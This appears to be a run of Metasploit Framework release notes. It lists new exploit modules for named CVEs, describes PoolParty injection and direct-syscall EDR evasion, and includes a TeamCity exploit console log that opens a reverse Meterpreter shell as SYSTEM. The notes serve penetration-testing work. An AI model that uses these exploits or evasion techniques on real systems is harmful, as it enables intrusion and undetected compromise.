Author: Alan David Foster

New module content (4)

GameOver(lay) Privilege Escalation and Container Escape

Authors: bwatters-r7, g1vi, gardnerapp, and h00die
Type: Exploit
Pull request: #19460 contributed by gardnerapp
Path: linux/local/gameoverlay_privesc
AttackerKB reference: CVE-2023-2640

Description: Adds a module for CVE-2023-2640 and CVE-2023-32629, a local privilege escalation in some Ubuntu kernel versions that abuses overly trusting OverlayFS features.

Clinic's Patient Management System 1.0 - Unauthenticated RCE

Authors: Aaryan Golatkar and Oğulcan Hami Gül
Type: Exploit
Pull request: #19733 contributed by aaryan-11-x
Path: multi/http/clinic_pms_fileupload_rce
AttackerKB reference: CVE-2022-40471

Description: New exploit module for Clinic's Patient Management System 1.0 that targets CVE-2022-40471. The module exploits unrestricted file upload, which can be further used to get remote code execution (RCE) through a malicious PHP file.

WordPress WP Time Capsule Arbitrary File Upload to RCE

Authors: Rein Daelman and Valentin Lobstein
Type: Exploit
Pull request: #19713 contributed by Chocapikk
Path: multi/http/wp_time_capsule_file_upload_rce
AttackerKB reference: CVE-2024-8856

Description: This exploits a remote code execution (RCE) vulnerability (CVE-2024-8856) in the WordPress WP Time Capsule plugin (versions ≤ 1.22.21). This vulnerability allows unauthenticated attackers to upload and execute arbitrary files due to improper validation within the plugin.

WSO2 API Manager Documentation File Upload Remote Code Execution

Authors: Heyder Andrade <@HeyderAndrade>, Redway Security <redwaysecurity.com>, and Siebene@ <@Siebene7>
Type: Exploit
Pull request: #19647 contributed by heyder
Path: multi/http/wso2_api_manager_file_upload_rce
AttackerKB reference: CVE-2023-2988

Description: Adds an exploit module for a vulnerability in the 'Add API Documentation' feature of WSO2 API Manager (CVE-2023-2988) that allows malicious users with specific permissions to upload arbitrary files to a user-controlled server location. This flaw allows for RCE on the target system.

Enhancements and features (4)

• #19546 from adfoster-r7 - Improves the database module cache performance from ~3 minutes to ~1 minute by performing bulk inserts of module metadata instead of multiple smaller inserts for every module/reference/author/etc.
• #19660 from zeroSteiner - Updates OptEnum to validate values without being case sensitive while preserving the case the author was expecting.
• #19715 from oddlittlebird - Improves db/README.md documentation.
• #19718 from sjanusz-r7 - Expose the currently authenticated rpc_token to RPC handlers.

Bugs fixed (4)

• #19719 from bwatters-r7 - Fixed a syntax error in the code generated by fetch payloads when the FETCH_DELETE option was enabled.
• #19721 from bwatters-r7 - This updates the way the module checks the Windows build version to determine if it's vulnerable to CVE-2020-0668.
• #19726 from pczinser - The reverse HTTP and HTTPS Meterpreter x64 payloads now correctly set the User-Agent HTTP header when connecting back to Metasploit. Before this fix, the HttpUserAgent option was not used properly. You can now use this option to customize the User-Agent HTTP header when using these payloads.
• #19739 from sjanusz-r7 - Fixes an issue with the post/multi/recon/local_exploit_suggester module which would crash if a TARGET value was set.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

• Pull Requests 6.4.40...6.4.41
• Full diff 6.4.40...6.4.41

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro.

Pool Party Windows Process Injection

This Metasploit-Framework release includes a new injection technique deployed on core Meterpreter functionalities such as process migration and DLL Injection.
The research of a new injection technique known as PoolParty highlighted new ways to gain code execution on a remote process by abusing Thread-Pool management features included on Windows kernel starting from Windows Vista. During our research effort to integrate the new injection technique inside the Meterpreter code-base we encountered some technical challenges we would like to share.. Currently Meterpreter makes use of the (in)famous system feature provided by Microsoft, the kernel32!CreateRemoteThread to achieve code injection. Although nowadays every EDR should be able to prevent an injection using this API call, this still is the most features rich way to inject code in a target process. Our goal during the porting of this technique was to find the variant more suitable for our needs:

• Able to pass a parameter pointer
• Able to be injected and later executed, like a Suspended Thread
• Be able to be injected from and to a WoW64 processes
• Leave less footprints as possible on the target process

From the Original Pool Party PoC we selected three candidates:

• TP_WAIT_INSERTION
• TP_DIRECT_INSERTION
• WORKER_THREAD_FACTORY_OVERWRITE

In order to achieve the same flexibility offered by the CreateRemoteThread an intermediate stub was developed in order to have correct parameter ordering, controlled execution over a duplicated handle and cleanup of the injection after successful execution making the migration chain looking like:

Pool-Party Stub Details

Argument Passing

The argument passing depends on the variant used, some of them allows argument passing but some doesn't, during our research we investigated and tested the following two variants for argument passing.

• TP_WAIT_INSERTION
• TP_DIRECT_INSERTION

Even if the TP_WAIT_INSERTION supports the argument pointer passing, the format of the WaitCallback expects the parameter to be on the second position instead of the first one, making necessary in an intermediate stub to avoid hot-patching the lpMigrationStub provided by framework.

To have an unified stub that could be used across all variants we decided to not use variant-specific argument passing and decided to retrieve our data from the end of the shellcode.

Delayed Execution

To achieve a suspended-like thread on the PoolParty we came up with the idea of creating and duplicating the HANDLE of an hEvent, in this way, when we perform the step 8. In our migration chain, the execution is delayed by the WaitForSingleObject inside the target process and later released by the Meterpreter using SetEvent against the duplicated handle.

Execution Cleanup

On the original PoC's shellcode, the execution ends inside an infinite loop that prevents thread from returning successfully. In our investigation we observed different outcomes depending on the variant used to achieve the injection. We were able to successfully clean up the execution on the TP_DIRECT_INSERTION variant.

Injection Features and Limits

Currently the PoolParty injection works with all the 64-bit systems having a Windows Kernel >= 10.0, it supports injection from x64 -> x64 and WoW64 -> x64. Currently there is no support for systems between Windows Vista and Windows 8.1 and the WoW64 injections are partially implemented due to some security restrictions.
Feel free to share with us feedback, issues or requests for further coverage by opening an Issue on GitHub or by sending a message to our Slack Metasploit server.

New module content (3)

WordPress Ultimate Member SQL Injection (CVE-2024-1071)

Authors: Christiaan Swiers and Valentin Lobstein
Type: Auxiliary
Pull request: #19488 contributed by Chocapikk
Path: scanner/http/wp_ultimate_member_sorting_sqli
AttackerKB reference: CVE-2024-1071

Description: This adds a new auxiliary module to exploit an unauthenticated SQL injection vulnerability in the Ultimate Member plugin for WordPress versions 2.1.3 to 2.8.2. The vulnerability allows an unauthenticated attacker to extract sensitive data via the sorting parameter.

WordPress wp-automatic Plugin SQLi Admin Creation

Authors: Rafie Muhammad and Valentin Lobstein
Type: Exploit
Pull request: #19489 contributed by Chocapikk
Path: multi/http/wp_automatic_sqli_to_rce
AttackerKB reference: CVE-2024-27956

Description: This adds a new exploit module for the SQL injection vulnerability in the WordPress wp-automatic plugin, affecting versions prior to 3.92.1. The vulnerability allows unauthenticated attackers to inject SQL commands, enabling them to create a malicious administrator account. Using the newly created admin account, the attacker can upload a plugin and achieve remote code execution.

Advanced Browser Data Extraction for Chromium and Gecko Browsers

Author: Alexander "xaitax" Hagenah
Type: Post
Pull request: #19506 contributed by xaitax
Path: windows/gather/enum_browsers

Description: Adds a new post-exploitation post/windows/gather/enum_browsers module which extracts sensitive browser data from both Chromium-based and Gecko-based browsers on the target system. It supports the decryption of passwords and cookies using Windows Data Protection API (DPAPI) and can extract additional data such as browsing history, keyword search history, download history, autofill data, credit card information, browser cache and installed extensions.

Enhanced Modules (1)

Modules which have either been enhanced, or renamed:

• #19527 from Chocapikk - Updates the exploit/multi/http/wp_givewp_rce module with a patch bypass. This module is now compatible with GiveWP version 3.16.1.

Enhancements and features (2)

• #19597 from zeroSteiner - Fix symlink and junction detection on Python windows Meterpreter.
• #19600 from adfoster-r7 - Updates the post windows modules gather/credentials/seamonkey, gather/credentials/chrome, and gather/enum_chrome as being superseded by windows/gather/enum_browsers.

Bugs fixed (3)

• #19551 from smashery - This fixes an issue when the LDAP session feature is enabled that caused the USERNAME and PASSWORD datastore options to be required, despite not being necessary when the configuration is set to kerberos or schannel.
• #19553 from smashery - This fixes a bug in modules that use Kerberos authentication where when the KrbOfferedEncryptionTypes datastore option was set, it would be ignored instead of used to select a compatible ticket from the cache.
• #19607 from adfoster-r7 - Fixes a bug that caused tables to render incorrectly when running under docker.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.4.33...6.4.34
• Full diff 6.4.33...6.4.34

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro

New module content (3)

Fortra FileCatalyst Workflow SQL Injection (CVE-2024-5276)

Authors: Michael Heinzl and Tenable
Type: Auxiliary
Pull request: #19373 contributed by h4x-x0r
Path: admin/http/fortra_filecatalyst_workflow_sqli
AttackerKB reference: CVE-2024-5276

Description: This adds an auxiliary module to exploit the CVE-2024-5276, a SQL injection vulnerability that allows for adding an arbitrary administration user in the application.

SPIP Unauthenticated RCE via porte_plume Plugin

Authors: Julien Voisin, Laluka, and Valentin Lobstein
Type: Exploit
Pull request: #19394 contributed by Chocapikk
Path: multi/http/spip_porte_plume_previsu_rce

Description: Adds a new exploit/multi/http/spip_porte_plume_previsu_rce SPIP unauthenticated remote code execution (RCE) module targeting SPIP versions up to and including 4.2.12.

DIAEnergie SQL Injection (CVE-2024-4548)

Authors: Michael Heinzl and Tenable
Type: Exploit
Pull request: #19351 contributed by h4x-x0r
Path: windows/scada/diaenergie_sqli
AttackerKB reference: CVE-2024-4548

Description: This adds an exploit module for CVE-2024-4548, an unauthenticated SQL injection vulnerability that allows remote code execution as NT AUTHORITY\SYSTEM.

Bugs fixed (1)

• #19366 from adeherdt-r7 - Updates the Jenkins login scanner to correctly determine whether authentication is required.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

• Pull Requests 6.4.22...6.4.23
• Full diff 6.4.22...6.4.23

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

New module content (5)

Telerik Report Server Auth Bypass

Authors: SinSinology and Spencer McIntyre
Type: Auxiliary
Pull request: #19242 contributed by zeroSteiner
Path: scanner/http/telerik_report_server_auth_bypass
AttackerKB reference: CVE-2024-4358

Description: This adds an exploit for CVE-2024-4358 which is an authentication bypass in Telerik Report Server versions up to and including 10.0.24.305.

Cacti Import Packages RCE

Authors: Christophe De La Fuente and Egidio Romano
Type: Exploit
Pull request: #19196 contributed by cdelafuente-r7
Path: multi/http/cacti_package_import_rce
AttackerKB reference: CVE-2024-25641

Description: This exploit module leverages an arbitrary file write vulnerability (CVE-2024-25641) in Cacti versions prior to 1.2.27 to achieve RCE. It abuses the Import Packages feature to upload a specially crafted package that embeds a PHP file.

VSCode ipynb Remote Development RCE

Authors: Zemnmez and h00die
Type: Exploit
Pull request: #18998 contributed by h00die
Path: multi/misc/vscode_ipynb_remote_dev_exec
AttackerKB reference: CVE-2022-41034

Description: VSCode allows users to open a Jypiter notebook (.ipynb) file. Versions v1.4.0 - v1.71.1 allow the Jypiter notebook to embed HTML and javascript, which can then open new terminal windows within VSCode. Each of these new windows can then execute arbitrary code at startup. This vulnerability is tracked as CVE-2022-41034.

Rejetto HTTP File Server (HFS) Unauthenticated Remote Code Execution

Authors: Arseniy Sharoglazov and sfewer-r7
Type: Exploit
Pull request: #19240 contributed by sfewer-r7
Path: windows/http/rejetto_hfs_rce_cve_2024_23692
AttackerKB reference: CVE-2024-23692

Description: Adds an exploit module for CVE-2024-23692, an unauthorized SSTI in the Rejetto HTTP File Server (HFS).

Telerik Report Server Auth Bypass and Deserialization RCE

Authors: SinSinology, Soroush Dalili, Spencer McIntyre, and Unknown
Type: Exploit
Pull request: #19243 contributed by zeroSteiner
Path: windows/http/telerik_report_server_deserialization
AttackerKB reference: CVE-2024-4358

Description: This adds an exploit for CVE-2024-1800 which is an authenticated RCE in Telerik Report Server. To function without authentication it chains CVE-2024-4358 to create a new administrator account before launching the authenticated RCE.

Enhancements and features (4)

• #19191 from adfoster-r7 - Adds support for Ruby 3.4.0-preview1.
• #19197 from sjanusz-r7 - Updates the new PostgreSQL, MSSQL, and MySQL session types to track the history of commands that the user has entered.
• #19199 from cgranleese-r7 - Updates brute force modules to output a summary of the credential discovered. This functionality is currently opt-in with the feature set show_successful_logins true msfconsole command.
• #19225 from h00die - This adds a link to android payload issues to increase visibility.

Bugs fixed (3)

• #19235 from cgranleese-r7 - Fixes an issue where Java payloads zip paths were not being created properly.
• #19239 from e2002e - Updates the modules/auxiliary/gather/zoomeye_search module to work again.
• #19248 from zgoldman-r7 - This removes an extra rescue clause added in error and allows the actual rescue clause to rescue exceptions properly in the event a staged http[s] payload calls back to a stageless http[s] listener.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.4.12...6.4.13
• Full diff 6.4.12...6.4.13

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro

New ESC4 Templates for AD CS

Metasploit added capabilities for exploiting the ESC family of flaws in AD CS in Metasploit 6.3. The ESC4 technique in particular has been supported for some time now thanks to the ad_cs_cert_templates module which enables users to read and write certificate template objects. This facilitates the exploitation of ESC4 which is a misconfiguration in the access controls of the LDAP object, allowing an attacker to tamper with them. This is typically used by an attacker to modify a certificate template object they are capable of modifying to make it susceptible to ESC1. Metasploit offers a premade template for ESC1 that a user could select to perform this attack.

This attack workflow was expanded on this week with two new templates for ESC2 and ESC3. These new templates allow Metasploit users that are concerned about ESC1 being detected with alternative options for exploitation. Additionally, the premade templates can be edited, to for example restrict permissions to a particular SID by changing the SDDL text of the ntSecurityDescriptor.

New module content (2)

WatchGuard XTM Firebox Unauthenticated Remote Command Execution

Authors: Charles Fol (Ambionics Security), Dylan Pindur (AssetNote), Misterxid, and h00die-gr3y h00die.gr3y@gmail.com
Type: Exploit
Pull request: #18915 contributed by h00die-gr3y
Path: linux/http/watchguard_firebox_unauth_rce_cve_2022_26318
AttackerKB reference: CVE-2022-26318

Description: This PR adds a module for a buffer overflow at the administration interface of WatchGuard Firebox and XTM appliances. The appliances are built from a cherrypy python backend sending XML-RPC requests to a C binary called wgagent using pre-authentication endpoint /agent/login. This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x before 12.5.9_U2. Successful exploitation results in remote code execution as user nobody.

Jenkins CLI Ampersand Replacement Arbitrary File Read

Authors: Vozec, Yaniv Nizry, binganao, h00die, and h4x0r-dz
Type: Auxiliary
Pull request: #18764 contributed by h00die
Path: gather/jenkins_cli_ampersand_arbitrary_file_read
AttackerKB reference: CVE-2024-23897

Description: This PR adds a new module to exploit CVE-2024-23897, an unauthorized arbitrary (first 2 lines) file read on Jenkins versions prior to 2.442 or for the LTS stream, versions prior to 2.426.3.

Enhancements and features (4)

• #18906 from zeroSteiner - This PR adds support for leveraging the ESC4 attack on misconfigured AD-CS servers to introduce ESC2 and ESC3.
• #18933 from sjanusz-r7 - Updates the new SQL session types to correctly remember previous commands that the user has entered.
• #19003 from ArchiMoebius - Updates msfvenom and payload generation to support formatting payloads as a Zig buffer.
• #19014 from cgranleese-r7 - Adds an initial set of acceptance tests for MySQL modules and session types.

Bugs fixed (3)

• #18935 from zeroSteiner - This PR fixes a common user mistake when authenticating with LDAP modules. Now, users can specify either the USERNAME (user) and DOMAIN (domain.local) datastore options or the original format of just the USERNAME in the UPN format (user@domain.local). This fix updates the LDAP library.
• #19007 from dwelch-r7 - Fixes a regression that affected exploit/multi/http/log4shell_header_injection module which stopped the module from running successfully.
• #19021 from cgranleese-r7 - Updates the admin/mysql/mysql_enum module to work with newer versions of MySQL.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.4.1...6.4.2
• Full diff 6.4.1...6.4.2

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Direct Syscalls Support for Windows Meterpreter

Direct system calls are a well-known technique that is often used to bypass EDR/AV detection. This technique is particularly useful when dynamic analysis is performed, where the security software monitors every process on the system to detect any suspicious activity. One common way to do so is to add user-land hooks on Win32 API calls, especially those commonly used by malware. Direct syscalls are a way to run system calls directly and enter kernel mode without passing through the Win32 API.

This first implementation focuses on substituting the Win32 API calls used by the Reflective DLL Injection (RDI) library with Direct Syscalls to the corresponding Native API's. For example, VirtualAlloc has been substituted by a system call to ZwAllocateVirtualMemory. Since RDI is used everywhere by Meterpreter and its extensions, it was a very good candidate for this initial work.

The main difficulty is to find the correct syscall number since it is not the same across Windows versions. Also, EDR's usually hook the NTDLL native API, making the discovery of syscall numbers more challenging. The technique used for this is based on the assumption that the syscall numbers are assigned in a sequential order, starting from the number 0. If we look at how native API functions are stored in memory, the syscall number can be deduced from the position of the related native API function in memory. The technique consists in selecting the system call functions (Zw…) from ntdll.dll exports and sorting them in ascending order of their memory addresses. The syscall number of one given native API function is simply its index in this sorted list. This is very similar to the technique used by Halo's Gate.

Another improvement is to make sure the call to the syscall instruction is made through ntdll.dll. EDR/AV can monitor this and flag any system calls not coming from ntdll.dll as suspicious. This technique is directly taken from RecycledGate. Here, the complexity is that Meterpreter must be compatible with all Windows versions from WinXP to the most recent flavors. This implementation will take care of parsing ntdll.dll and get the correct trampoline address that will be used when the system call is executed.

This work is a first step and we expect more additions this year. The next step is to switch additional Win32 API requests that Meterpreter and its extensions make to their corresponding native API using Direct Syscalls. The long-term goal is to make Direct Syscalls a standard for any future Windows-based development (payload, exploit, etc.).

New module content (8)

GL.iNet Unauthenticated Remote Command Execution via the logread module.

Authors: DZONERZY, Unknown, and h00die-gr3y h00die.gr3y@gmail.com
Type: Exploit
Pull request: #18648 contributed by h00die-gr3y
Path: linux/http/glinet_unauth_rce_cve_2023_50445

Description: This PR adds an exploit module for a number of different GL.iNet network products. The module combines an authentication by-pass vulnerability (CVE-2023-50919) with an RCE (CVE-2023-50445) allowing the user to remotely obtain, without authentication, a Meterpreter session running in the context of the root user.

Ivanti Connect Secure Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18708 contributed by sfewer-r7
Path: linux/http/ivanti_connect_secure_rce_cve_2023_46805

Description: This PR adds an exploit chain that consists of two vulnerabilities, an authentication bypass (CVE-2023-46805) and a command injection vulnerability (CVE-2024-21887). The exploit chain allows a remote unauthenticated attacker to execute arbitrary OS commands with root privileges. As per the Ivanti advisory, these vulnerabilities affect all supported versions of the products, versions 9.x and 22.x. It is unknown if the unsupported versions 8.x and older are also affected.

MajorDoMo Command Injection

Authors: Valentin Lobstein and smcintyre-r7
Type: Exploit
Pull request: #18630 contributed by Chocapikk
Path: linux/http/majordomo_cmd_inject_cve_2023_50917

Description: This adds an exploit for a command injection vulnerability in MajorDoMo versions before 0662e5e.

Saltstack Minion Payload Deployer

Authors: c2Vlcgo and h00die
Type: Exploit
Pull request: #18626 contributed by h00die
Path: linux/local/saltstack_salt_minion_deployer

Description: This PR adds an exploit module which allows for a user who has compromised a host acting as a SaltStack Master to deploy payloads to the Minions attached to that Master.

Apache Commons Text RCE

Authors: Alvaro Muñoz, Gaurav Jain, and Karthik UJ
Type: Exploit
Pull request: #18638 contributed by errorxyz
Path: multi/http/apache_commons_text4shell

Description: Adds an exploit module for CVE-2022-42889 that targets web apps utilizing Apache Commons Text's (1.5-1.9) StringSubstitutor interpolator class in an insecure fashion.

Atlassian Confluence SSTI Injection

Authors: Harsh Jaiswal, Rahul Maini, and Spencer McIntyre
Type: Exploit
Pull request: #18734 contributed by zeroSteiner
Path: multi/http/atlassian_confluence_rce_cve_2023_22527

Description: This adds an exploit for CVE-2023-22527 which is an unauthenticated RCE in Atlassian Confluence. The vulnerability is due to an SSTI flaw that allows an OGNL expression to be evaluated. The result is OS command execution in the context of the service account.

PRTG CVE-2023-32781 Authenticated RCE

Author: Kevin Joensen kevin@baldur.dk
Type: Exploit
Pull request: #18568 contributed by ggisz
Path: windows/http/prtg_authenticated_rce_cve_2023_32781

Description: This PR adds a module leveraging CVE-2023-32781, an authenticated command injection vulnerability in PRTG versions 23.2.84.1566 and earlier. The result is command execution as SYSTEM.

Memory Search

Author: sjanusz-r7
Type: Post
Pull request: #18713 contributed by sjanusz-r7
Path: multi/gather/memory_search

Description: Adds a new multi/gather/memory_search module that can read memory of processes on Windows and Linux hosts with Meterpreter. Regular expressions can be used to find passwords/credentials, and glob patterns and PIDs can be used to identify target processes.

Enhancements and features (6)

• #17634 from adfoster-r7 - Reliability and stability notes that have been previously missing have been added to some modules.
• #18645 from jvoisin - This adds a way to get the Build ID from ld.so by using the 'perf' command. Before this module depended on the commands 'file' and 'readelf' being installed to get the Build ID.
• #18663 from sjanusz-r7 - Adds a new Postgres session type, which is current behind a feature flag that can be activated with: features set postgresql_session_type true. Example usage: use scanner/postgres/postgres_login followed by run postgres://postgres:password@127.0.0.1:9000/template1 createsession=true verbose=false.
• #18720 from zeroSteiner - This enhancement marks the existing Unix encoders as also being compatible with Linux. Previously, no encoder modules were marked as compatible with Linux, so users could not set bad character when using the new fetch payloads.
• #18735 from AleksaZatezalo - Adds additional module metadata to the exploits/windows/iis/iis_webdav_scstoragepathfromurl module.
• #18737 from zeroSteiner - This updates metasploit-payloads gem to 2.0.165 to pull in changes to support direct syscalls for Meterpreter on Windows. See this PR and this PR for details.

Bugs fixed (3)

• #18662 from dwelch-r7 - Fixes an edgecase where features set dns_feature true did not correctly parse a user's /etc/resolv.conf file if there were multiple nameservers present.
• #18712 from ekalinichev-r7 - Fixes a crash with Metasploit's REST api when calling /api/v1/modules?name=aux.
• #18746 from zeroSteiner - Fixes a module bug when using the generate OPTION=VALUE syntax. Previously, the module's datastore would be unintentionally updated with the new option value.

Documentation added (1)

• #18729 from poupapaa - This fixes a typo in Metasploit-Guide-SMB.md.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.52...6.3.53
• Full diff 6.3.52...6.3.53

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

TeamCity authentication bypass and remote code execution

This week’s Metasploit release includes a new module for a critical authentication bypass in JetBrains TeamCity CI/CD Server. All versions of TeamCity prior to version 2023.05.4 are vulnerable to this issue. The vulnerability was originally discovered by SonarSource, and the Metasploit module was developed by Rapid7’s Principal Security Researcher Stephen Fewer who additionally published a technical analysis on AttackerKB for CVE-2023-42793. A Rapid7 TeamCity customer advisory has also been released with details on mitigation guidance.

This exploit works against both Windows and Linux targets. Example usage:

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > show options 

Module options (exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793):

   Name                     Current Setting  Required  Description
   ----                     ---------------  --------  -----------
   Proxies                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                   192.168.159.10   yes       The target host(s)
   RPORT                    8111             yes       The target port (TCP)
   SSL                      false            no        Negotiate SSL/TLS for outgoing connections
   TEAMCITY_ADMIN_ID        1                yes       The ID of an administrator account to authenticate as
   TEAMCITY_CHANGE_TIMEOUT  30               yes       The timeout to wait for the changes to be applied
   VHOST                                     no        HTTP server virtual host


Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      cymQYMMk         no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               192.168.250.134  yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > exploit

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 2023.05.3 (build 129390) detected.
[*] Token already exists, deleting and generating a new one.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.UUxBSk0zMGk1eWFzRGZRYjg3LWJqWVVrY1Fn.YjU0NmIwYjUtNTZmNC00N2U3LWI4MGItMDdhOTQ0YjIzZGQ5
[*] Modifying internal.properties to allow process creation...
[*] Waiting for configuration change to be applied...
[*] Executing payload...
[*] Resetting the internal.properties settings...
[*] Sending stage (200774 bytes) to 192.168.250.237
[*] Waiting for configuration change to be applied...
[*] Deleting the authentication token.
[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 192.168.250.237:65397) at 2023-09-28 13:29:20 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DC
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 9
Meterpreter     : x64/windows
meterpreter >

New module content (2)

JetBrains TeamCity Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18408 contributed by sfewer-r7
Path: multi/http/jetbrains_teamcity_rce_cve_2023_42793

Description: This adds an unauthenticated RCE for JetBrain's TeamCity server on both Linux and Windows. A remote attacker can exploit an authentication bypass vulnerability and then execute OS commands in the context of the service.

Microsoft Error Reporting Local Privilege Elevation Vulnerability

Authors: Filip Dragović (Wh04m1001), Octoberfest7, and bwatters-r7
Type: Exploit
Pull request: #18314 contributed by bwatters-r7
Path: windows/local/win_error_cve_2023_36874

Description: This adds an exploit module that leverages a directory traversal vulnerability in Windows 10. This vulnerability is identified as CVE-2023-36874 and enables an attacker to elevate privileges to those of the NT AUTHORITY\SYSTEM user. Note that this module works with Windows 10x64 22H2.

Enhancements and features (1)

• #18399 from h00die - Fixes multiple spelling mistakes in module documentation.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.35...6.3.36
• Full diff 6.3.35...6.3.36

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit T-Shirt Design Contest

In honor of Metasploit's 20th anniversary, Rapid7 is launching special edition t-shirts - and we're inviting members of our community to have a hand in its creation. The contest winner will have their design featured on the shirts, which will then be available to pick up at Black Hat 2023.

We will be accepting submissions from now through June 30! Contest details, design guidelines, and submission instructions here

New module content (12)

RPyC 4.1.0 through 4.1.1 Remote Command Execution

Authors: Aaron Meese and Jamie Hill-Daniel
Type: Auxiliary
Pull request: #17670 contributed by ajmeese7
AttackerKB reference: CVE-2019-16328

Description: Adds a new rpyc_rce module to exploit CVE-2019-16328 and achieve remote command execution as the vulnerable server’s service user.

Apache RocketMQ Version Scanner

Authors: Malayke and h00die
Type: Auxiliary
Pull request: #18075 contributed by h00die

Description: This PR adds a version scanner for Apache RocketMQ.

Symmetricom SyncServer Unauthenticated Remote Command Execution

Authors: Justin Fatuch Apt4hax, Robert Bronstein, and Steve Campbell
Type: Exploit
Pull request: #18077 contributed by sdcampbell
AttackerKB reference: CVE-2022-40022

Description: This adds an exploit for Symmetricom SyncServer appliances (S100-S300 series) vulnerable to an unauthenticated command injection in the hostname parameter in a request to the /controller/ping.php endpoint. The command injection vulnerability is patched in the S650 v2.2. Requesting the endpoint will result in a redirect to the login page; however, the command will still be executed, resulting in RCE as the root user.

TerraMaster TOS 4.2.06 or lower - Unauthenticated Remote Code Execution

Authors: IHTeam and h00die-gr3y
Type: Exploit
Pull request: #18063 contributed by h00die-gr3y
AttackerKB reference: CVE-2020-28188

Description: This adds an exploit for TerraMaster NAS devices running TOS 4.2.06 or prior. The logic in include/makecvs.php permits shell metacharacters through the Event parameter in a GET request, permitting the upload of a webshell without authentication. Through this, an attacker can achieve remote code execution as the user running the TOS web interface.

TerraMaster TOS 4.2.15 or lower - RCE chain from unauthenticated to root via session crafting.

Authors: h00die-gr3y and n0tme
Type: Exploit
Pull request: #18070 contributed by h00die-gr3y
AttackerKB reference: CVE-2021-45841

Description: This exploits a series of vulnerabilities including session crafting and command injection in TerraMaster NAS versions 4.2.15 and below to achieve unauthenticated RCE as the root user.

TerraMaster TOS 4.2.29 or lower - Unauthenticated RCE chaining CVE-2022-24990 and CVE-2022-24989

Authors: 0xf4n9x, Octagon Networks, and h00die-gr3y
Type: Exploit
Pull request: #18086 contributed by h00die-gr3y
AttackerKB reference: CVE-2022-24989

Description: This exploits an administrative password leak and command injection vulnerability on TerraMaster devices running TerraMaster Operating System (TOS) versions 4.2.29 and below to achieve unauthenticated RCE as the root user.

Zyxel IKE Packet Decoder Unauthenticated Remote Code Execution

Author: sf
Type: Exploit
Pull request: #18016 contributed by sfewer-r7
AttackerKB reference: CVE-2023-28771

Description: This adds an exploit for CVE-2023-28771 which is a remote, unauthenticated OS command injection in IKE service of several Zyxel devices. Successful exploitation results in remote command execution as the root user.

Oracle Weblogic PreAuth Remote Command Execution via ForeignOpaqueReference IIOP Deserialization

Authors: 14m3ta7k, 4ra1n, and Grant Willcox
Type: Exploit
